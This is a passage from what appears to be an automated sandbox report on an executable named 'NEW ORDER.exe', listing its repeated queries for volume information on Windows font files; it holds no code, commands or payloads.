                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
